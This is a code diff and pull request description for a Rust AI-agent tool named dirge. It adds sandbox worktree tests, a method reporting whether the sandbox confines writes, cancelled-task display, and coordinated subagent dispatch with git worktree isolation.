+
+    #[tokio::test]
+    async fn exec_in_off_mode_uses_worktree() {
+        let worktree =
+            std::env::temp_dir().join(format!("dirge-sandbox-root-{}", uuid::Uuid::new_v4()));
+        std::fs::create_dir_all(&worktree).unwrap();
+        let root = SandboxExecutionRoot {
+            worktree: worktree.clone(),
+            main_git_dir: worktree.join(".git"),
+        };
+        let sb = Sandbox::new(SandboxMode::Off);
+        let output = sb.exec_in("pwd", 5, &root).await.unwrap();
+        assert_eq!(
+            std::path::Path::new(output.merged.trim())
+                .canonicalize()
+                .unwrap(),
+            worktree.canonicalize().unwrap()
+        );
+        std::fs::remove_dir_all(worktree).unwrap();
+    }
+
+    #[test]
+    fn wrap_command_in_off_sets_worktree_current_dir() {
+        let root = SandboxExecutionRoot {
+            worktree: PathBuf::from("/tmp/dirge-worktree"),
+            main_git_dir: PathBuf::from("/tmp/dirge-main/.git"),
+        };
+        let cmd = Sandbox::new(SandboxMode::Off).wrap_command_in("true", &root);
+        assert_eq!(
+            cmd.as_std().get_current_dir(),
+            Some(root.worktree.as_path())
+        );
+    }
+
+    #[test]
+    fn wrap_command_in_bwrap_binds_and_changes_to_execution_root() {
+        let root = SandboxExecutionRoot {
+            worktree: PathBuf::from("/tmp/dirge-worktree"),
+            main_git_dir: PathBuf::from("/tmp/dirge-main/.git"),
+        };
+        let sb = Sandbox::new(SandboxMode::Bwrap);
+        if sb.mode == SandboxMode::Bwrap {
+            let out = format!("{:?}", sb.wrap_command_in("true", &root).as_std());
+            assert!(
+                out.contains("--ro-bind"),
+                "expected read-only host bind: {out}"
+            );
+            assert!(
+                out.contains("/tmp/dirge-worktree"),
+                "expected worktree bind: {out}"
+            );
+            assert!(
+                out.contains("/tmp/dirge-main/.git"),
+                "expected main git bind: {out}"
+            );
+            assert!(
+                out.contains("--chdir"),
+                "expected rooted working directory: {out}"
+            );
+        }
     }
 
     // ── wrap_command ────────────────────────────────────────────

--- a/src/sandbox/mod.rs
+++ b/src/sandbox/mod.rs
@@ -133,6 +133,20 @@ impl Sandbox {
         }
     }
 
+    /// True when the sandbox actually confines file writes (bwrap active, or
+    /// microVM). Returns `false` for `Off` — on those hosts the shell can
+    /// escape a worktree root via `../` or absolute paths, so worktree-based
+    /// write isolation gives a false guarantee.
+    #[cfg(feature = "sandbox-microvm")]
+    pub fn confines_writes(&self) -> bool {
+        matches!(self.mode, SandboxMode::Bwrap | SandboxMode::Microvm)
+    }
+
+    #[cfg(not(feature = "sandbox-microvm"))]
+    pub fn confines_writes(&self) -> bool {
+        matches!(self.mode, SandboxMode::Bwrap)
+    }
+
     /// Override the microVM image. No-op when sandbox mode is not Microvm.
     #[cfg(feature = "sandbox-microvm")]
     pub fn set_microvm_image(&self, image: String) -> Result<(), anyhow::Error> {
@@ -927,6 +941,19 @@ mod tests {
     fn sandbox_new_off_stays_off() {
         let sb = Sandbox::new(SandboxMode::Off);
         assert_eq!(sb.mode, SandboxMode::Off);
+    }
+
+    #[test]
+    fn confines_writes_returns_false_for_off() {
+        let sb = Sandbox::new(SandboxMode::Off);
+        assert!(!sb.confines_writes());
+    }
+
+    #[test]
+    fn confines_writes_returns_true_for_bwrap_when_available() {
+        let sb = Sandbox::new(SandboxMode::Bwrap);
+        // On macOS (no bwrap in PATH), mode falls back to Off
+        assert_eq!(sb.confines_writes(), sb.mode == SandboxMode::Bwrap);
     }
 
     #[test]

--- a/src/ui/mod.rs
+++ b/src/ui/mod.rs
@@ -4426,6 +4426,10 @@ pub async fn run_interactive(
                                         let head = sanitize_single_line(err, 80);
                                         (format!("[task {} failed: {}]", short, head), c_error())
                                     }
+                                    TS::Cancelled(reason) => {
+                                        let head = sanitize_single_line(reason, 80);
+                                        (format!("[task {} cancelled: {}]", short, head), c_tool())
+                                    }
                                     // Running is never queued for notification.
                                     TS::Running => continue,
                                 }


### PR DESCRIPTION
## Summary

This PR adds coordinated subagent dispatch with optional worktree isolation for read-write subagents, plus the lifecycle hardening identified during review. Resolves #660 

- Coordinates background subagents in batches and delivers one reconciliation update after the batch reaches terminal states.
- Routes work through configured `readonly` and `readwrite` agent profiles.
- Runs isolated writers in rooted Git worktrees when available; otherwise `auto` mode warns and serializes writers in the parent checkout.
- Preserves writer branch, path, commit, dirty-state, and salvage metadata in reconciliation output.
- Documents configuration, dispatch modes, worktree behavior, limits, and troubleshooting in `docs/subagent-dispatch-strategy.md`.


## Validation

```text
cargo fmt --check
cargo check --bin dirge
cargo clippy --all-targets -- -D warnings
cargo test --bin dirge -- --skip h7_glm
```